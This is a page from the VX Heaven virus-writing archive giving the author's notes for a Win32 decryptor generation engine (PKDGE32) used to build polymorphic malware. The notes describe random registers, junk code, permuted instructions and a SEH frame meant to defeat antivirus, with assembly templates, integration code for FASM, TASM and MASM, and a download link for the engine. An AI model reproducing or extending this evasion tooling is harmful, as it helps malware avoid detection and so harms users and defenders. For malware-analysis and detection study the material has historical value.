Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum
[Previous] [Index] [Next]

pker's Decryptor Generation Engine for Win32

Author: pker

Author's notes

I wanted to code a polymorphic engine when I first started coding this. Then I got the idea of generating decrypt code dynamically instead of morphing the original decrypt code. The generated decryptor uses random registerz, with junk code inserted, and it's instruction-permutable. When coding, I found that the name 'decrypt generation engine' is more appropriate than a polymorphic engine, so I renamed it to PKDBE32.

Generally, the decrypt code looks like the following:

                  mov     Rw,offset code2decrypt      ; (1)
                  mov     Rz,decrypt_size             ; (2)
decrypt_loop:     xor     byte [Rw],imm8              ; (3)
                  inc     Rw                          ; (4)
                  dec     Rz                          ; (5)
                  jnz     decrypt_loop                ; (6)

As we can see, I used Rx, Ry, Rz in the code above, instead of EAX, EBX, ... this means the we can use random registerz in the decrypt code. The engine can select random registerz to generate each instruction. Meanwhile, the first 2 instructionz are permutable, so the engine will put the 2 instructionz in a random order. Also, we know that some of the instructionz can be replaced by other instructionz that performed the same. For example, we can use PUSH/POP to replace MOV XXX/XXX, etc. Last but important, is, the engine will insert junk codez after each instructionz.

One more thing, the engine setup a SEH frame before the decrypt code in order to fuck some AVsoftz. And of course, there're also junk codez between these instructionz.

The SEH frame's like the following code:

start:            call    setup_seh                   ; (1)
                  mov     esp,[esp+8]                 ; (2)
                  jmp     end_seh                     ; (3)
setup_seh:        xor     Rx,Rx                       ; (4)
                  push    dword [fs:Rx]               ; (5)
                  mov     [fs:Rx],esp                 ; (6)
                  dec     dword [Rx]                  ; (7)
                  jmp     start                       ; (8)
end_seh:          xor     Ry,Ry                       ; (9)
                  pop     dword [fs:Ry]               ; (10)
                  pop     Rz                          ; (11)

Then comes the real decrypt code (generated by this engine).

How to use it?

This engine can compile with FASM, TASM and MASM, etc.

When using FASM we can:

decryptor: times 40h      db      90h
crypt_code: ...
crypted_size = $-crypt_code
rng_seed          dd          ?

gen_decrytpor:    mov     edi,decryptor
                  mov     esi,rng_seed
                  mov     ebx,crypt_code
                  mov     ecx,crypted_size
                  mov     edx,9ah
                  call    __pkdge32

When using TASM or MASM we should:

decryptor         db      40h dup (90h)
crypt_code: ...
crypted_size = $-crypt_code
rng_seed          dd          ?

gen_decrytpor:    mov     edi,offset decryptor
                  mov     esi,offset rng_seed
                  mov     ebx,offset crypt_code
                  mov     ecx,crypted_size
                  mov     edx,9ah
                  call    __pkdge32

One more feature, the engine returns the address of the code2decrypt field in the decryptor, so we can fix this value after generating the decryptor. This means we can replace the code which to be decrypt anywhere after generating the decrypt code. We can replace our code which to be decrypted just after the decryptor, without padding so many NOPz between them :P

We could code like this:

col_code: times crypted_size+200h    db   0

gen_decrytpor:    mov     edi,col_code
                  mov     esi,rng_seed
                  mov     ecx,crypted_size
                  mov     ebx,12345678h
                  mov     edx,12345678h
                  call    __pkdge32
fix_address:      mov     esi,edi
                  xchg    eax,edi
                  stosd
                  xchg    esi,edi
copy_code:        mov     esi,crypt_code
                  mov     ecx,crypted_size
                  rep     movsb

Well, enjoy it!


Comments
Download

 FilenameSizeDescriptionDate 
pkdge32.zip5956PKDGE32Jan 2005MD5 sum 990206d05ecf6492a2d70fbcb5c73853


By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua